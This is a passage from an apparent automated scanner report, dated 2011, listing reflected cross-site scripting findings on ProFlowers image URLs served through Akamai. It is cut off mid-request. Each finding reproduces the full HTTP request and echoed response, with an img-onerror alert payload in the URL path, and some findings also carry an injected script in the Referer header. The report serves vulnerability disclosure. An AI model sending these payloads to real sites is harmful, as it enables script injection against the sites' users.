GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img src=a onerror=alert(1)>06385eca2

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0 was submitted in the REST URL parameter 9. This input was echoed as 98f67<img src=a onerror=alert(1)>58f8ed190d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img src=a onerror=alert(1)>58f8ed190d0

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9 was submitted in the REST URL parameter 9. This input was echoed as 48187<img src=a onerror=alert(1)>f3fd15c3de9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:57 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img src=a onerror=alert(1)>f3fd15c3de9

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470 was submitted in the REST URL parameter 9. This input was echoed as 21185<img src=a onerror=alert(1)>f2d54a66470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img src=a onerror=alert(1)>f2d54a66470

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53 was submitted in the REST URL parameter 9. This input was echoed as 49976<img src=a onerror=alert(1)>da2ce43ff53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/CAReaster_pnk10_PF49976<img src=a onerror=alert(1)>da2ce43ff53

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a was submitted in the REST URL parameter 9. This input was echoed as da675<img src=a onerror=alert(1)>a07aa15604a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img src=a onerror=alert(1)>a07aa15604a

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b was submitted in the REST URL parameter 9. This input was echoed as ce03a<img src=a onerror=alert(1)>9d86da2ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img src=a onerror=alert(1)>9d86da2ef7b

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc was submitted in the REST URL parameter 9. This input was echoed as 812a0<img src=a onerror=alert(1)>961839e23fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img src=a onerror=alert(1)>961839e23fc

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28 was submitted in the REST URL parameter 9. This input was echoed as f71af<img src=a onerror=alert(1)>58e4fbecd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tnf71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tnf71af<img src=a onerror=alert(1)>58e4fbecd28

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5 was submitted in the REST URL parameter 9. This input was echoed as 7d085<img src=a onerror=alert(1)>7f387170b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:22 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img src=a onerror=alert(1)>7f387170b5

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 28232<img%20src%3da%20onerror%3dalert(1)>694141eb889 was submitted in the REST URL parameter 9. This input was echoed as 28232<img src=a onerror=alert(1)>694141eb889 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img%20src%3da%20onerror%3dalert(1)>694141eb889?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img src=a onerror=alert(1)>694141eb889

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4 was submitted in the REST URL parameter 9. This input was echoed as e7337<img src=a onerror=alert(1)>5e353b6f9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:20 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img src=a onerror=alert(1)>5e353b6f9c4

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d was submitted in the REST URL parameter 9. This input was echoed as ec5f1<img src=a onerror=alert(1)>20d57e53c2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img src=a onerror=alert(1)>20d57e53c2d

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86 was submitted in the REST URL parameter 9. This input was echoed as f096f<img src=a onerror=alert(1)>6fffa73ca86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:09 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img src=a onerror=alert(1)>6fffa73ca86

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7 was submitted in the REST URL parameter 9. This input was echoed as ef49c<img src=a onerror=alert(1)>7e2a3d4dba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img src=a onerror=alert(1)>7e2a3d4dba7

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58 was submitted in the REST URL parameter 9. This input was echoed as 799e8<img src=a onerror=alert(1)>5150b0f3d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
